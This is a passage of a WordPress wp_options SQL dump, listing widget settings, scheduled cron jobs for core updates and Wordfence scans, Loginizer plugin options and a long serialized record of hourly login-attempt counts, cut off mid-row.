(104, 'sidebars_widgets', 'a:10:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:5:{i:0;s:7:"block-2";i:1;s:7:"block-3";i:2;s:7:"block-4";i:3;s:7:"block-5";i:4;s:7:"block-6";}s:13:"header-widget";a:0:{}s:15:"footer-widget-1";a:0:{}s:15:"footer-widget-2";a:0:{}s:24:"advanced-footer-widget-1";a:0:{}s:24:"advanced-footer-widget-2";a:0:{}s:24:"advanced-footer-widget-3";a:0:{}s:24:"advanced-footer-widget-4";a:0:{}s:13:"array_version";i:3;}', 'yes'),
(105, 'cron', 'a:19:{i:1712770163;a:1:{s:35:"wordfence_batchReportFailedAttempts";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:2:{s:8:"schedule";b:0;s:4:"args";a:0:{}}}}i:1712770616;a:1:{s:34:"wp_privacy_delete_old_export_files";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:6:"hourly";s:4:"args";a:0:{}s:8:"interval";i:3600;}}}i:1712770708;a:1:{s:11:"wp_cache_gc";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:2:{s:8:"schedule";b:0;s:4:"args";a:0:{}}}}i:1712771385;a:1:{s:21:"wordfence_ls_ntp_cron";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:6:"hourly";s:4:"args";a:0:{}s:8:"interval";i:3600;}}}i:1712771390;a:1:{s:21:"wordfence_hourly_cron";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:6:"hourly";s:4:"args";a:0:{}s:8:"interval";i:3600;}}}i:1712777815;a:3:{s:16:"wp_version_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:17:"wp_update_plugins";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:16:"wp_update_themes";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1712778575;a:1:{s:26:"wordfence_daily_autoUpdate";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1712778590;a:1:{s:20:"wordfence_daily_cron";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1712781079;a:1:{s:21:"wp_update_user_counts";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1712821015;a:1:{s:32:"recovery_mode_clean_expired_keys";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1712824279;a:3:{s:19:"wp_scheduled_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:25:"delete_expired_transients";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:30:"wp_scheduled_auto_draft_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1712825525;a:1:{s:29:"astra_get_knowledge_base_data";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1712825940;a:2:{s:13:"wpseo-reindex";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:31:"wpseo_permalink_structure_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1712940000;a:1:{s:30:"wordfence_start_scheduled_scan";a:1:{s:32:"06c10e1c211f85154b25a3c900bb60b5";a:2:{s:8:"schedule";b:0;s:4:"args";a:1:{i:0;i:1712940000;}}}}i:1713196800;a:1:{s:31:"wordfence_email_activity_report";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:2:{s:8:"schedule";b:0;s:4:"args";a:0:{}}}}i:1713199200;a:1:{s:30:"wordfence_start_scheduled_scan";a:1:{s:32:"e118b8f588060522f403f16de0e02a2c";a:2:{s:8:"schedule";b:0;s:4:"args";a:1:{i:0;i:1713199200;}}}}i:1713253015;a:1:{s:30:"wp_site_health_scheduled_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:6:"weekly";s:4:"args";a:0:{}s:8:"interval";i:604800;}}}i:1713371077;a:1:{s:30:"wp_delete_temp_updater_backups";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:6:"weekly";s:4:"args";a:0:{}s:8:"interval";i:604800;}}}s:7:"version";i:2;}', 'yes'),
(106, 'widget_pages', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(107, 'widget_calendar', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(108, 'widget_archives', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(109, 'widget_media_audio', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(110, 'widget_media_image', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(111, 'widget_media_gallery', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(112, 'widget_media_video', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(113, 'widget_meta', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(114, 'widget_search', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(115, 'widget_recent-posts', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(116, 'widget_recent-comments', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(117, 'widget_tag_cloud', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(118, 'widget_nav_menu', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(119, 'widget_custom_html', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(120, 'recovery_keys', 'a:0:{}', 'yes'),
(121, 'theme_mods_twentytwentythree', 'a:2:{s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1681116723;s:4:"data";a:3:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:3:{i:0;s:7:"block-2";i:1;s:7:"block-3";i:2;s:7:"block-4";}s:9:"sidebar-2";a:2:{i:0;s:7:"block-5";i:1;s:7:"block-6";}}}}', 'no'),
(122, 'loginizer_version', '1.8.4', 'yes'),
(123, 'loginizer_options', 'a:0:{}', 'yes'),
(124, 'loginizer_last_reset', '1712721841', 'yes'),
(125, 'loginizer_whitelist', 'a:0:{}', 'yes'),
(126, 'loginizer_blacklist', 'a:0:{}', 'yes'),
(127, 'loginizer_2fa_whitelist', 'a:0:{}', 'yes'),
(128, 'loginizer_ins_time', '1681112216', 'yes'),
(129, 'loginizer_promo_time', '-1685335924', 'yes'),
(130, 'loginizer_backuply_promo_time', '1681112216', 'yes'),
(131, 'loginizer_csrf_promo_time', '1681112216', 'yes'),
(140, 'loginizer_login_attempt_stats', 'a:1797:{i:1681113600;a:2:{i:1;i:2;i:0;i:2;}i:1681120800;a:1:{i:1;i:1;}i:1681128000;a:1:{i:1;i:1;}i:1681135200;a:1:{i:0;i:3;}i:1681138800;a:1:{i:0;i:3;}i:1681149600;a:1:{i:0;i:3;}i:1681156800;a:1:{i:0;i:3;}i:1681167600;a:1:{i:0;i:1;}i:1681171200;a:1:{i:0;i:3;}i:1681192800;a:1:{i:0;i:3;}i:1681200000;a:1:{i:0;i:3;}i:1681210800;a:1:{i:0;i:3;}i:1681218000;a:1:{i:0;i:3;}i:1681228800;a:1:{i:0;i:1;}i:1681232400;a:1:{i:0;i:3;}i:1681239600;a:1:{i:0;i:4;}i:1681254000;a:1:{i:0;i:3;}i:1681261200;a:1:{i:0;i:3;}i:1681264800;a:1:{i:0;i:4;}i:1681268400;a:1:{i:0;i:3;}i:1681282800;a:1:{i:0;i:4;}i:1681286400;a:1:{i:0;i:3;}i:1681290000;a:1:{i:0;i:4;}i:1681293600;a:1:{i:0;i:4;}i:1681297200;a:1:{i:0;i:5;}i:1681300800;a:1:{i:0;i:3;}i:1681304400;a:1:{i:0;i:2;}i:1681311600;a:1:{i:0;i:4;}i:1681315200;a:1:{i:0;i:1;}i:1681318800;a:1:{i:0;i:3;}i:1681322400;a:1:{i:0;i:4;}i:1681326000;a:1:{i:0;i:3;}i:1681329600;a:1:{i:0;i:4;}i:1681333200;a:1:{i:0;i:3;}i:1681336800;a:1:{i:0;i:7;}i:1681340400;a:1:{i:0;i:6;}i:1681347600;a:1:{i:0;i:1;}i:1681351200;a:1:{i:0;i:3;}i:1681354800;a:1:{i:0;i:1;}i:1681358400;a:1:{i:0;i:1;}i:1681362000;a:1:{i:0;i:3;}i:1681365600;a:1:{i:0;i:7;}i:1681369200;a:1:{i:0;i:5;}i:1681372800;a:1:{i:0;i:8;}i:1681376400;a:1:{i:0;i:5;}i:1681380000;a:1:{i:0;i:2;}i:1681383600;a:1:{i:0;i:5;}i:1681387200;a:1:{i:0;i:5;}i:1681390800;a:1:{i:0;i:7;}i:1681394400;a:1:{i:0;i:8;}i:1681398000;a:1:{i:0;i:1;}i:1681401600;a:1:{i:0;i:2;}i:1681405200;a:1:{i:0;i:1;}i:1681408800;a:1:{i:0;i:2;}i:1681412400;a:1:{i:0;i:4;}i:1681419600;a:1:{i:0;i:3;}i:1681423200;a:1:{i:0;i:8;}i:1681426800;a:1:{i:0;i:1;}i:1681430400;a:1:{i:0;i:11;}i:1681434000;a:1:{i:0;i:12;}i:1681437600;a:1:{i:0;i:4;}i:1681441200;a:1:{i:0;i:2;}i:1681444800;a:1:{i:0;i:3;}i:1681448400;a:1:{i:0;i:7;}i:1681452000;a:1:{i:0;i:8;}i:1681455600;a:1:{i:0;i:3;}i:1681459200;a:1:{i:0;i:5;}i:1681462800;a:1:{i:0;i:1;}i:1681466400;a:1:{i:0;i:9;}i:1681473600;a:1:{i:0;i:2;}i:1681477200;a:1:{i:0;i:3;}i:1681488000;a:1:{i:0;i:3;}i:1681491600;a:1:{i:0;i:3;}i:1681498800;a:1:{i:0;i:6;}i:1681502400;a:1:{i:0;i:9;}i:1681509600;a:1:{i:0;i:3;}i:1681516800;a:1:{i:0;i:12;}i:1681520400;a:1:{i:0;i:6;}i:1681534800;a:1:{i:0;i:2;}i:1681538400;a:1:{i:0;i:3;}i:1681542000;a:1:{i:0;i:2;}i:1681545600;a:1:{i:0;i:3;}i:1681549200;a:1:{i:0;i:3;}i:1681552800;a:1:{i:0;i:3;}i:1681556400;a:1:{i:0;i:12;}i:1681560000;a:1:{i:0;i:2;}i:1681563600;a:1:{i:0;i:1;}i:1681567200;a:1:{i:0;i:3;}i:1681578000;a:1:{i:0;i:3;}i:1681585200;a:1:{i:0;i:5;}i:1681588800;a:1:{i:0;i:11;}i:1681592400;a:1:{i:0;i:6;}i:1681596000;a:1:{i:0;i:12;}i:1681599600;a:1:{i:0;i:3;}i:1681603200;a:1:{i:0;i:4;}i:1681606800;a:1:{i:0;i:4;}i:1681610400;a:1:{i:0;i:5;}i:1681614000;a:1:{i:0;i:6;}i:1681617600;a:1:{i:0;i:5;}i:1681621200;a:1:{i:0;i:5;}i:1681624800;a:1:{i:0;i:8;}i:1681628400;a:1:{i:0;i:6;}i:1681632000;a:1:{i:0;i:3;}i:1681635600;a:1:{i:0;i:8;}i:1681639200;a:1:{i:0;i:5;}i:1681642800;a:1:{i:0;i:5;}i:1681646400;a:1:{i:0;i:12;}i:1681650000;a:1:{i:0;i:15;}i:1681653600;a:1:{i:0;i:9;}i:1681657200;a:1:{i:0;i:6;}i:1681660800;a:1:{i:0;i:3;}i:1681664400;a:1:{i:0;i:6;}i:1681668000;a:1:{i:0;i:6;}i:1681671600;a:1:{i:0;i:2;}i:1681675200;a:1:{i:0;i:9;}i:1681678800;a:1:{i:0;i:3;}i:1681682400;a:1:{i:0;i:3;}i:1681686000;a:1:{i:0;i:2;}i:1681689600;a:1:{i:0;i:6;}i:1681693200;a:1:{i:0;i:3;}i:1681696800;a:1:{i:0;i:3;}i:1681700400;a:1:{i:0;i:11;}i:1681704000;a:1:{i:0;i:18;}i:1681707600;a:1:{i:0;i:13;}i:1681711200;a:1:{i:0;i:17;}i:1681714800;a:1:{i:0;i:10;}i:1681718400;a:1:{i:0;i:16;}i:1681722000;a:1:{i:0;i:11;}i:1681725600;a:1:{i:0;i:10;}i:1681729200;a:1:{i:0;i:8;}i:1681732800;a:1:{i:0;i:12;}i:1681736400;a:1:{i:0;i:11;}i:1681740000;a:1:{i:0;i:8;}i:1681743600;a:1:{i:0;i:6;}i:1681747200;a:1:{i:0;i:5;}i:1681750800;a:1:{i:0;i:2;}i:1681754400;a:1:{i:0;i:3;}i:1681758000;a:1:{i:0;i:8;}i:1681761600;a:1:{i:0;i:5;}i:1681765200;a:1:{i:0;i:1;}i:1681768800;a:1:{i:0;i:3;}i:1681772400;a:1:{i:0;i:7;}i:1681776000;a:1:{i:0;i:6;}i:1681779600;a:1:{i:0;i:2;}i:1681783200;a:1:{i:0;i:6;}i:1681786800;a:1:{i:0;i:10;}i:1681790400;a:1:{i:0;i:8;}i:1681794000;a:1:{i:0;i:11;}i:1681797600;a:1:{i:0;i:11;}i:1681801200;a:1:{i:0;i:11;}i:1681804800;a:1:{i:0;i:9;}i:1681808400;a:1:{i:0;i:3;}i:1681812000;a:1:{i:0;i:8;}i:1681815600;a:1:{i:0;i:4;}i:1681819200;a:1:{i:0;i:10;}i:1681822800;a:1:{i:0;i:6;}i:1681826400;a:1:{i:0;i:3;}i:1681830000;a:1:{i:0;i:12;}i:1681833600;a:1:{i:0;i:6;}i:1681837200;a:1:{i:0;i:5;}i:1681840800;a:1:{i:0;i:4;}i:1681844400;a:1:{i:0;i:2;}i:1681848000;a:1:{i:0;i:5;}i:1681851600;a:1:{i:0;i:2;}i:1681855200;a:1:{i:0;i:6;}i:1681858800;a:1:{i:0;i:2;}i:1681862400;a:1:{i:0;i:4;}i:1681866000;a:1:{i:0;i:6;}i:1681869600;a:1:{i:0;i:5;}i:1681873200;a:1:{i:0;i:5;}i:1681876800;a:1:{i:0;i:2;}i:1681880400;a:1:{i:0;i:4;}i:1681884000;a:1:{i:0;i:2;}i:1681887600;a:1:{i:0;i:1;}i:1681891200;a:1:{i:0;i:6;}i:1681894800;a:1:{i:0;i:7;}i:1681898400;a:1:{i:0;i:5;}i:1681902000;a:1:{i:0;i:4;}i:1681905600;a:1:{i:0;i:2;}i:1681909200;a:1:{i:0;i:4;}i:1681912800;a:1:{i:0;i:2;}i:1681920000;a:1:{i:0;i:6;}i:1681934400;a:1:{i:0;i:9;}i:1681938000;a:1:{i:0;i:3;}i:1681941600;a:1:{i:0;i:3;}i:1681948800;a:1:{i:0;i:6;}i:1681952400;a:1:{i:0;i:4;}i:1681959600;a:1:{i:0;i:1;}i:1681963200;a:1:{i:0;i:3;}i:1681966800;a:1:{i:0;i:2;}i:1681970400;a:1:{i:0;i:3;}i:1681974000;a:1:{i:0;i:4;}i:1681977600;a:1:{i:0;i:5;}i:1681981200;a:1:{i:0;i:5;}i:1681984800;a:1:{i:0;i:5;}i:1681988400;a:1:{i:0;i:4;}i:1681992000;a:1:{i:0;i:8;}i:1681995600;a:1:{i:0;i:3;}i:1681999200;a:1:{i:0;i:11;}i:1682002800;a:1:{i:0;i:1;}i:1682006400;a:1:{i:0;i:4;}i:1682010000;a:1:{i:0;i:4;}i:1682013600;a:1:{i:0;i:13;}i:1682017200;a:1:{i:0;i:20;}i:1682020800;a:1:{i:0;i:12;}i:1682024400;a:1:{i:0;i:11;}i:1682028000;a:1:{i:0;i:17;}i:1682031600;a:1:{i:0;i:13;}i:1682035200;a:1:{i:0;i:17;}i:1682038800;a:1:{i:0;i:4;}i:1682042400;a:1:{i:0;i:1;}i:1682046000;a:1:{i:0;i:3;}i:1682049600;a:1:{i:0;i:1;}i:1682053200;a:1:{i:0;i:5;}i:1682056800;a:1:{i:0;i:9;}i:1682060400;a:1:{i:0;i:3;}i:1682064000;a:1:{i:0;i:10;}i:1682067600;a:1:{i:0;i:13;}i:1682071200;a:1:{i:0;i:11;}i:1682074800;a:1:{i:0;i:14;}i:1682078400;a:1:{i:0;i:10;}i:1682082000;a:1:{i:0;i:7;}i:1682085600;a:1:{i:0;i:2;}i:1682089200;a:1:{i:0;i:2;}i:1682092800;a:1:{i:0;i:5;}i:1682096400;a:1:{i:0;i:3;}i:1682100000;a:1:{i:0;i:3;}i:1682103600;a:1:{i:0;i:5;}i:1682107200;a:1:{i:0;i:3;}i:1682110800;a:1:{i:0;i:5;}i:1682114400;a:1:{i:0;i:2;}i:1682118000;a:1:{i:0;i:3;}i:1682121600;a:1:{i:0;i:3;}i:1682125200;a:1:{i:0;i:8;}i:1682128800;a:1:{i:0;i:9;}i:1682132400;a:1:{i:0;i:1;}i:1682136000;a:1:{i:0;i:1;}i:1682139600;a:1:{i:0;i:4;}i:1682143200;a:1:{i:0;i:8;}i:1682146800;a:1:{i:0;i:10;}i:1682150400;a:1:{i:0;i:4;}i:1682154000;a:1:{i:0;i:8;}i:1682157600;a:1:{i:0;i:3;}i:1682161200;a:1:{i:0;i:4;}i:1682164800;a:1:{i:0;i:3;}i:1682168400;a:1:{i:0;i:4;}i:1682172000;a:1:{i:0;i:6;}i:1682175600;a:1:{i:0;i:4;}i:1682179200;a:1:{i:0;i:6;}i:1682182800;a:1:{i:0;i:6;}i:1682186400;a:1:{i:0;i:4;}i:1682190000;a:1:{i:0;i:1;}i:1682193600;a:1:{i:0;i:7;}i:1682197200;a:1:{i:0;i:1;}i:1682200800;a:1:{i:0;i:5;}i:1682211600;a:1:{i:0;i:5;}i:1682215200;a:1:{i:0;i:1;}i:1682218800;a:1:{i:0;i:6;}i:1682222400;a:1:{i:0;i:5;}i:1682226000;a:1:{i:0;i:4;}i:1682229600;a:1:{i:0;i:5;}i:1682233200;a:1:{i:0;i:2;}i:1682236800;a:1:{i:0;i:8;}i:1682240400;a:1:{i:0;i:5;}i:1682244000;a:1:{i:0;i:4;}i:1682247600;a:1:{i:0;i:6;}i:1682251200;a:1:{i:0;i:7;}i:1682254800;a:1:{i:0;i:5;}i:1682258400;a:1:{i:0;i:7;}i:1682262000;a:1:{i:0;i:16;}i:1682265600;a:1:{i:0;i:9;}i:1682269200;a:1:{i:0;i:11;}i:1682272800;a:1:{i:0;i:9;}i:1682276400;a:1:{i:0;i:8;}i:1682280000;a:1:{i:0;i:2;}i:1682283600;a:1:{i:0;i:10;}i:1682287200;a:1:{i:0;i:9;}i:1682290800;a:1:{i:0;i:14;}i:1682294400;a:1:{i:0;i:8;}i:1682298000;a:1:{i:0;i:4;}i:1682301600;a:1:{i:0;i:1;}i:1682305200;a:1:{i:0;i:2;}i:1682308800;a:1:{i:0;i:3;}i:1682312400;a:1:{i:0;i:3;}i:1682316000;a:1:{i:0;i:6;}i:1682319600;a:1:{i:0;i:8;}i:1682323200;a:1:{i:0;i:10;}i:1682326800;a:1:{i:0;i:10;}i:1682330400;a:1:{i:0;i:9;}i:1682334000;a:1:{i:0;i:4;}i:1682337600;a:1:{i:0;i:12;}i:1682341200;a:1:{i:0;i:2;}i:1682344800;a:1:{i:0;i:5;}i:1682348400;a:1:{i:0;i:4;}i:1682352000;a:1:{i:0;i:2;}i:1682355600;a:1:{i:0;i:3;}i:1682359200;a:1:{i:0;i:7;}i:1682362800;a:1:{i:0;i:8;}i:1682366400;a:1:{i:0;i:8;}i:1682370000;a:1:{i:0;i:5;}i:1682373600;a:1:{i:0;i:4;}i:1682377200;a:1:{i:0;i:8;}i:1682380800;a:1:{i:0;i:4;}i:1682384400;a:1:{i:0;i:6;}i:1682388000;a:1:{i:0;i:4;}i:1682391600;a:1:{i:0;i:7;}i:1682395200;a:1:{i:0;i:2;}i:1682398800;a:1:{i:0;i:2;}i:1682402400;a:1:{i:0;i:6;}i:1682406000;a:1:{i:0;i:13;}i:1682409600;a:1:{i:0;i:11;}i:1682413200;a:1:{i:0;i:7;}i:1682416800;a:1:{i:0;i:9;}i:1682420400;a:1:{i:0;i:7;}i:1682424000;a:1:{i:0;i:9;}i:1682427600;a:1:{i:0;i:9;}i:1682431200;a:1:{i:0;i:5;}i:1682434800;a:1:{i:0;i:2;}i:1682442000;a:1:{i:0;i:3;}i:1682445600;a:1:{i:0;i:2;}i:1682449200;a:1:{i:0;i:4;}i:1682452800;a:1:{i:0;i:3;}i:1682456400;a:1:{i:0;i:4;}i:1682460000;a:1:{i:0;i:2;}i:1682481600;a:1:{i:0;i:1;}i:1682485200;a:1:{i:0;i:5;}i:1682488800;a:1:{i:0;i:6;}i:1682492400;a:1:{i:0;i:7;}i:1682496000;a:1:{i:0;i:3;}i:1682499600;a:1:{i:0;i:3;}i:1682503200;a:1:{i:0;i:2;}i:1682506800;a:1:{i:0;i:1;}i:1682510400;a:1:{i:0;i:7;}i:1682514000;a:1:{i:0;i:6;}i:1682517600;a:1:{i:0;i:8;}i:1682521200;a:1:{i:0;i:9;}i:1682524800;a:1:{i:0;i:5;}i:1682528400;a:1:{i:0;i:3;}i:1682532000;a:1:{i:0;i:7;}i:1682535600;a:1:{i:0;i:4;}i:1682539200;a:1:{i:0;i:1;}i:1682542800;a:1:{i:0;i:5;}i:1682546400;a:1:{i:0;i:6;}i:1682550000;a:1:{i:0;i:5;}i:1682553600;a:1:{i:0;i:4;}i:1682557200;a:1:{i:0;i:4;}i:1682560800;a:1:{i:0;i:2;}i:1682564400;a:1:{i:0;i:3;}i:1682568000;a:1:{i:0;i:4;}i:1682571600;a:1:{i:0;i:2;}i:1682575200;a:1:{i:0;i:4;}i:1682578800;a:1:{i:0;i:9;}i:1682582400;a:1:{i:0;i:6;}i:1682586000;a:1:{i:0;i:7;}i:1682589600;a:1:{i:0;i:5;}i:1682593200;a:1:{i:0;i:9;}i:1682596800;a:1:{i:0;i:8;}i:1682600400;a:1:{i:0;i:5;}i:1682604000;a:1:{i:0;i:8;}i:1682607600;a:1:{i:0;i:5;}i:1682611200;a:1:{i:0;i:3;}i:1682614800;a:1:{i:0;i:6;}i:1682618400;a:1:{i:0;i:3;}i:1682622000;a:1:{i:0;i:4;}i:1682625600;a:1:{i:0;i:1;}i:1682629200;a:1:{i:0;i:3;}i:1682632800;a:1:{i:0;i:5;}i:1682636400;a:1:{i:0;i:2;}i:1682640000;a:1:{i:0;i:3;}i:1682643600;a:1:{i:0;i:3;}i:1682647200;a:1:{i:0;i:2;}i:1682650800;a:1:{i:0;i:4;}i:1682654400;a:1:{i:0;i:3;}i:1682658000;a:1:{i:0;i:3;}i:1682661600;a:1:{i:0;i:5;}i:1682665200;a:1:{i:0;i:5;}i:1682668800;a:1:{i:0;i:8;}i:1682672400;a:1:{i:0;i:2;}i:1682676000;a:1:{i:0;i:6;}i:1682683200;a:1:{i:0;i:6;}i:1682686800;a:1:{i:0;i:4;}i:1682690400;a:1:{i:0;i:7;}i:1682694000;a:1:{i:0;i:4;}i:1682697600;a:1:{i:0;i:7;}i:1682701200;a:1:{i:0;i:10;}i:1682704800;a:1:{i:0;i:17;}i:1682708400;a:1:{i:0;i:12;}i:1682712000;a:1:{i:0;i:10;}i:1682715600;a:1:{i:0;i:6;}i:1682719200;a:1:{i:0;i:9;}i:1682722800;a:1:{i:0;i:6;}i:1682726400;a:1:{i:0;i:6;}i:1682730000;a:1:{i:0;i:4;}i:1682733600;a:1:{i:0;i:2;}i:1682737200;a:1:{i:0;i:5;}i:1682740800;a:1:{i:0;i:4;}i:1682744400;a:1:{i:0;i:4;}i:1682748000;a:1:{i:0;i:3;}i:1682751600;a:1:{i:0;i:7;}i:1682755200;a:1:{i:0;i:4;}i:1682758800;a:1:{i:0;i:9;}i:1682762400;a:1:{i:0;i:7;}i:1682766000;a:1:{i:0;i:4;}i:1682769600;a:1:{i:0;i:7;}i:1682773200;a:1:{i:0;i:3;}i:1682776800;a:1:{i:0;i:3;}i:1682780400;a:1:{i:0;i:4;}i:1682784000;a:1:{i:0;i:9;}i:1682787600;a:1:{i:0;i:5;}i:1682791200;a:1:{i:0;i:7;}i:1682794800;a:1:{i:0;i:8;}i:1682798400;a:1:{i:0;i:9;}i:1682802000;a:1:{i:0;i:6;}i:1682805600;a:1:{i:0;i:6;}i:1682809200;a:1:{i:0;i:3;}i:1682812800;a:1:{i:0;i:11;}i:1682816400;a:1:{i:0;i:9;}i:1682820000;a:1:{i:0;i:6;}i:1682823600;a:1:{i:0;i:5;}i:1682827200;a:1:{i:0;i:2;}i:1682830800;a:1:{i:0;i:7;}i:1682834400;a:1:{i:0;i:12;}i:1682838000;a:1:{i:0;i:13;}i:1682841600;a:1:{i:0;i:2;}i:1682845200;a:1:{i:0;i:5;}i:1682848800;a:1:{i:0;i:6;}i:1682852400;a:1:{i:0;i:6;}i:1682856000;a:1:{i:0;i:4;}i:1682859600;a:1:{i:0;i:5;}i:1682863200;a:1:{i:0;i:4;}i:1682866800;a:1:{i:0;i:5;}i:1682870400;a:1:{i:0;i:9;}i:1682874000;a:1:{i:0;i:6;}i:1682877600;a:1:{i:0;i:10;}i:1682881200;a:1:{i:0;i:8;}i:1682884800;a:1:{i:0;i:9;}i:1682888400;a:1:{i:0;i:14;}i:1682892000;a:1:{i:0;i:7;}i:1682895600;a:1:{i:0;i:7;}i:1682899200;a:1:{i:0;i:7;}i:1682902800;a:1:{i:0;i:3;}i:1682906400;a:1:{i:0;i:3;}i:1682910000;a:1:{i:0;i:8;}i:1682913600;a:1:{i:0;i:2;}i:1682917200;a:1:{i:0;i:3;}i:1682920800;a:1:{i:0;i:4;}i:1682924400;a:1:{i:0;i:4;}i:1682928000;a:1:{i:0;i:4;}i:1682931600;a:1:{i:0;i:4;}i:1682935200;a:1:{i:0;i:2;}i:1682938800;a:1:{i:0;i:4;}i:1682942400;a:1:{i:0;i:3;}i:1682946000;a:1:{i:0;i:4;}i:1682949600;a:1:{i:0;i:3;}i:1682953200;a:1:{i:0;i:2;}i:1682956800;a:1:{i:0;i:3;}i:1682960400;a:1:{i:0;i:2;}i:1682964000;a:1:{i:0;i:6;}i:1682967600;a:1:{i:0;i:6;}i:1682971200;a:1:{i:0;i:3;}i:1682974800;a:1:{i:0;i:4;}i:1682978400;a:1:{i:0;i:2;}i:1682982000;a:1:{i:0;i:4;}i:1682985600;a:1:{i:0;i:3;}i:1682989200;a:1:{i:0;i:5;}i:1682992800;a:1:{i:0;i:1;}i:1683000000;a:1:{i:0;i:6;}i:1683003600;a:1:{i:0;i:3;}i:1683007200;a:1:{i:0;i:6;}i:1683014400;a:1:{i:0;i:3;}i:1683018000;a:1:{i:0;i:3;}i:1683046800;a:1:{i:0;i:7;}i:1683050400;a:1:{i:0;i:3;}i:1683054000;a:1:{i:0;i:4;}i:1683061200;a:1:{i:0;i:3;}i:1683068400;a:1:{i:0;i:3;}i:1683072000;a:1:{i:0;i:3;}i:1683075600;a:1:{i:0;i:7;}i:1683079200;a:1:{i:0;i:8;}i:1683082800;a:1:{i:0;i:9;}i:1683086400;a:1:{i:0;i:18;}i:1683090000;a:1:{i:0;i:21;}i:1683093600;a:1:{i:0;i:21;}i:1683097200;a:1:{i:0;i:11;}i:1683100800;a:1:{i:0;i:10;}i:1683104400;a:1:{i:0;i:13;}i:1683108000;a:1:{i:0;i:9;}i:1683111600;a:1:{i:0;i:6;}i:1683115200;a:1:{i:0;i:8;}i:1683118800;a:1:{i:0;i:6;}i:1683122400;a:1:{i:0;i:6;}i:1683126000;a:1:{i:0;i:8;}i:1683129600;a:1:{i:0;i:2;}i:1683133200;a:1:{i:0;i:4;}i:1683136800;a:1:{i:0;i:2;}i:1683140400;a:1:{i:0;i:8;}i:1683144000;a:1:{i:0;i:8;}i:1683147600;a:1:{i:0;i:7;}i:1683151200;a:1:{i:0;i:4;}i:1683154800;a:1:{i:0;i:6;}i:1683158400;a:1:{i:0;i:5;}i:1683162000;a:1:{i:0;i:7;}i:1683165600;a:1:{i:0;i:10;}i:1683169200;a:1:{i:0;i:14;}i:1683172800;a:1:{i:0;i:14;}i:1683176400;a:1:{i:0;i:13;}i:1683180000;a:1:{i:0;i:12;}i:1683183600;a:1:{i:0;i:9;}i:1683187200;a:1:{i:0;i:16;}i:1683190800;a:1:{i:0;i:7;}i:1683194400;a:1:{i:0;i:12;}i:1683198000;a:1:{i:0;i:15;}i:1683201600;a:1:{i:0;i:8;}i:1683205200;a:1:{i:0;i:11;}i:1683208800;a:1:{i:0;i:6;}i:1683212400;a:1:{i:0;i:9;}i:1683216000;a:1:{i:0;i:4;}i:1683219600;a:1:{i:0;i:5;}i:1683223200;a:1:{i:0;i:1;}i:1683226800;a:1:{i:0;i:2;}i:1683230400;a:1:{i:0;i:1;}i:1683234000;a:1:{i:0;i:1;}i:1683237600;a:1:{i:0;i:1;}i:1683241200;a:1:{i:0;i:5;}i:1683244800;a:1:{i:0;i:1;}i:1683248400;a:1:{i:0;i:2;}i